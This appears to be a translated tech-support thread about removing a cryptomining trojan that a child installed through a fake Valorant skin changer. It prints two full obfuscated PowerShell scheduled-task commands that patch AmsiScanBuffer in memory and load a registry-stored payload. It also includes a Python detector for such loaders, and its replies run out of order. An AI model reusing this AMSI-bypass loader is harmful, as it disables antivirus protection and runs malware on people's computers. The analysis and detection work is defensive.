O22 - Task: nslooksvc32 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:KUUibsYzdVVZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$flCbqwKNrRNgbw,[Parameter(Position=1)][Type]$trxeVYymQW)$paalNHZeNmu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$paalNHZeNmu.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');$paalNHZeNmu.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$trxeVYymQW,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');Write-Output $paalNHZeNmu.CreateType();}$esKTVjEbEydev=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$BLsWUgXPabQYEv=$esKTVjEbEydev.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zhDFYQRlKZJklGZhJlg=KUUibsYzdVVZ @([String])([IntPtr]);$HouUUsVdZbZakOwaaqnUNb=KUUibsYzdVVZ 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FjTfoJARZLM=$esKTVjEbEydev.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$qIROLtoHyfQMRl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Load'+'LibraryA')));$BzKZfVwvYaCgfQTdI=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Vir'+'tual'+'Pro'+'tect')));$gqDzMuu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qIROLtoHyfQMRl,$zhDFYQRlKZJklGZhJlg).Invoke('a'+'m'+'si.dll');$thgHnFpRwqzfvbdgl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$gqDzMuu,[Object]('Ams'+'iSc'+'an'+'Buffer')));$tFojzPMnml=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,4,[ref]$tFojzPMnml);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$thgHnFpRwqzfvbdgl,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,0x20,[ref]$tFojzPMnml);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
O22 - Task: nslooksvc64 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:yZzuiYRezadz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EWellkmPyYZzro,[Parameter(Position=1)][Type]$LjtIPhnXDu)$XEsJbemsTkG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$XEsJbemsTkG.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');$XEsJbemsTkG.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$LjtIPhnXDu,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');Write-Output $XEsJbemsTkG.CreateType();}$EznyfjngDAhAs=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$sYOssrpLYJJpjX=$EznyfjngDAhAs.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$aAfmdyFNvhcWtryWFmg=yZzuiYRezadz @([String])([IntPtr]);$iyqMBNsEEaEwzblKaRROoC=yZzuiYRezadz 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LUQEzwkExfi=$EznyfjngDAhAs.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$vESqRXeDRnNXMw=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Load'+'LibraryA')));$gsFUORhqEFVSkXOmO=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Vir'+'tual'+'Pro'+'tect')));$MyWMWhO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vESqRXeDRnNXMw,$aAfmdyFNvhcWtryWFmg).Invoke('a'+'m'+'si.dll');$SNXmKatLTctWUQlcY=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$MyWMWhO,[Object]('Ams'+'iSc'+'an'+'Buffer')));$VNvaCoBJHL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,4,[ref]$VNvaCoBJHL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SNXmKatLTctWUQlcY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,0x20,[ref]$VNvaCoBJHL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - D:\Games\Grand Theft Auto V\Launcher\RockstarService.exe (file missing)

The active malware should now be removed. You can test this by reinstalling Kaspersky. I also recommend running a full system scan with the tool below.



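The two nslooksvc tasks in the log above are PowerShell one-liners that resolve AmsiScanBuffer and VirtualProtect by hand, overwrite the first bytes of AmsiScanBuffer in memory, and then load a .NET assembly stored in the registry value HKLM\SOFTWARE\nslookstager. As an added example (not the forum helper's code nor the diagnostic tool's), here is how a responder could triage such task entries automatically instead of reading every one-liner: it collapses the `'a'+'b'` string splitting that hides the API names, looks for the relevant calls, and classifies each task. The sample log lines, the indicator names and the function names are constructed here; the nslooksvc lines are heavily shortened stand-ins for the real entries and keep only the API references needed for detection.

```python
"""Triage of 'O22 - Task:' entries from a diagnostic log for in-memory
PowerShell loaders.  Added example, not the forum helper's code nor the
log tool's; indicator names and the sample lines are constructed here."""
import re

# Constructed, heavily shortened stand-ins for the task lines in the log above.
# The two nslooksvc entries keep only the API references needed for detection
# (the patch bytes are elided); PcaPatchDbTask and Kaspersky are benign controls.
SAMPLE_LOG = r"""
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: Kaspersky_Upgrade_Launcher_{278ADC42-419D-4547-A6CA-5B74BE0AD901} - C:\Program Files\Common Files\AV\Kaspersky Lab\upgrade_launcher.exe /waitUpgrade (file missing)
O22 - Task: nslooksvc32 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "$t=[AppDomain]::CurrentDomain.GetAssemblies().GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$g=$t.GetMethod('Ge'+'tPr'+'ocAdd'+'ress');$a=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($l,$d).Invoke('a'+'m'+'si.dll');$s=$g.Invoke($Null,@([Object]$a,[Object]('Ams'+'iSc'+'an'+'Buffer')));$v=$g.Invoke($Null,@([Object]$k,[Object]('Vir'+'tual'+'Pro'+'tect')));[Runtime.InteropServices.Marshal]::Copy([Byte[]](...),0,$s,8);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
O22 - Task: nslooksvc64 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "$a=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($l,$d).Invoke('a'+'m'+'si.dll');$s=$g.Invoke($Null,@([Object]$a,[Object]('Ams'+'iSc'+'an'+'Buffer')));$v=$g.Invoke($Null,@([Object]$k,[Object]('Vir'+'tual'+'Pro'+'tect')));[Runtime.InteropServices.Marshal]::Copy([Byte[]](...),0,$s,6);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
"""

# "O22 - Task: [(tag)] <name> - <command line>"; lines like "(damaged) ... (empty)"
# carry no command and are skipped.
TASK_LINE = re.compile(r"^O22 - Task: (?:\([^)]*\) )?(?P<name>.+?) - (?P<cmd>.+)$")
# One 'left'+'right' pair of single-quoted literals.
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")

# Indicators checked on the de-obfuscated command line (names are ours).
INDICATORS = {
    "amsi_scan_buffer": re.compile(r"AmsiScanBuffer", re.I),
    "virtual_protect": re.compile(r"VirtualProtect", re.I),
    "memory_patch": re.compile(r"Marshal\]::Copy\(", re.I),
    "dynamic_pinvoke": re.compile(r"GetDelegateForFunctionPointer", re.I),
    "registry_payload": re.compile(r"Registry\]::\w+\.OpenSubkey\([^)]*\)\.GetValue\(", re.I),
    "reflective_load": re.compile(r"Reflection\.Assembly\]::Load\(", re.I),
}


def deobfuscate(cmd):
    """Collapse 'a'+'b'+'c' concatenations until no adjacent pair is left."""
    prev = None
    while prev != cmd:
        prev = cmd
        cmd = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", cmd)
    return cmd


def classify(hits):
    """Turn the set of matched indicator names into a short verdict."""
    if {"amsi_scan_buffer", "memory_patch"} <= hits:
        return "amsi-patch loader"
    if {"reflective_load", "registry_payload"} <= hits:
        return "registry-stored payload loader"
    if hits:
        return "suspicious"
    return "clean"


def analyze_task_lines(log_text):
    """Return one record per parsable task line: name, indicators, verdict."""
    results = []
    for line in log_text.splitlines():
        m = TASK_LINE.match(line)
        if not m:
            continue
        raw = m.group("cmd")
        cmd = deobfuscate(raw)
        hits = {name for name, rx in INDICATORS.items() if rx.search(cmd)}
        results.append({
            "name": m.group("name"),
            "powershell": "powershell" in raw.lower(),
            "split_strings": raw.count("'+'"),   # crude obfuscation score
            "hits": sorted(hits),
            "verdict": classify(hits),
        })
    return results


if __name__ == "__main__":
    for r in analyze_task_lines(SAMPLE_LOG):
        print(f"{r['verdict']:30} {r['name']}  split_strings={r['split_strings']} hits={r['hits']}")
```

Run against a full diagnostic log, only the two nslooksvc entries come back as "amsi-patch loader"; the Microsoft and Kaspersky tasks stay "clean". The `split_strings` count is a useful secondary signal on its own: legitimate scheduled tasks almost never build their command line out of dozens of one- and two-character string fragments. For what it is worth, the `LastDllError = 225` entries in the debug section above are ERROR_VIRUS_INFECTED, i.e. the installed antivirus refused to let the tool open the two .job files, which is consistent with the tasks being flagged.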
Sir, I couldn't understand the fixing part. Other than that, the malware tool you recommended found a trojan named sihost64.exe; I looked it up on the internet and it said it was a mining virus. It deleted it with one click without any trouble. Thank you very much for your help.
 
Hello everyone, yesterday my brother installed some silly program called Valorant skin changer; he is 9 years old and did it without my knowledge. A mining virus infected the computer. I was able to delete part of it, but Kaspersky could not delete one virus named "MEM:Trojan.Win32.SEPEH.gen" (location: System memory). I tried running in safe mode and deleting it, it didn't work; I clicked "open file location" and it didn't open; when I try to remove it the screen goes away.
Applications I tried:
Kaspersky Anti-Virus
360 Total Security.
Trojan Remover.
Besides these, I was going to try Malwarebytes, but at the end of the installation it stops responding and closes. (Someone on the internet wrote that they solved a heating problem with it.)
Also, since this virus started, Windows+S doesn't work, Task Manager was giving an error at startup, and the SSD has become terribly slow.

Also, I can't update my graphics card driver. (error 1603)

A clean reinstall is the cleanest solution.